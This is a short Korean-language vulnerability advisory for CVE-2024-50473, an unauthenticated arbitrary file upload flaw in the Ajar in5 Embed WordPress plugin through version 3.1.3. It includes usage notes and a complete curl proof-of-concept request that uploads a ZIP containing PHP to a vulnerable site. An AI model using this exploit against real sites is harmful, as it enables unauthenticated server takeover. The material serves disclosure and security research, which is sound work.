
Ajar in5 Embed <= 3.1.3 - 인증되지 않은 임의 파일 업로드
Ajar in5 Embed <= 3.1.3 - 인증되지 않은 임의 파일 업로드
Ajar in5 Embed WordPress 플러그인은 버전 3.1.3까지(포함) 모든 버전에서 파일 형식 검증이 누락되어 임의 파일 업로드에 취약합니다. 이로 인해 인증되지 않은 공격자가 영향을 받는 사이트의 서버에 임의의 파일을 업로드할 수 있으며, 원격 코드 실행이 가능해질 수 있습니다.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50473
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: ajar-productions-in5-embed
참고: ZIP 파일에는 비어 있더라도 index.html 파일이 포함되어야 하며, 500 오류가 발생할 수 있지만 이는 정상입니다.
업로드된 파일은 /wp-content/uploads/2024/php5/에서 찾을 수 있습니다. 여기서 php5는 확장자를 제외한 ZIP 파일의 이름입니다.
curl -X POST "http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=in5&in5=upload" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0" \
-H "Accept: application/json, text/javascript, */*; q=0.01" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://kubernetes.docker.internal/wp-admin/post.php?post=4142&action=edit" \
-H "X-Requested-With: XMLHttpRequest" \
-H "Content-Type: multipart/form-data" \
-F "customPath=wp-content/uploads/2024/" \
-F "files[]=@/path/to/php5.zip" \
--compressed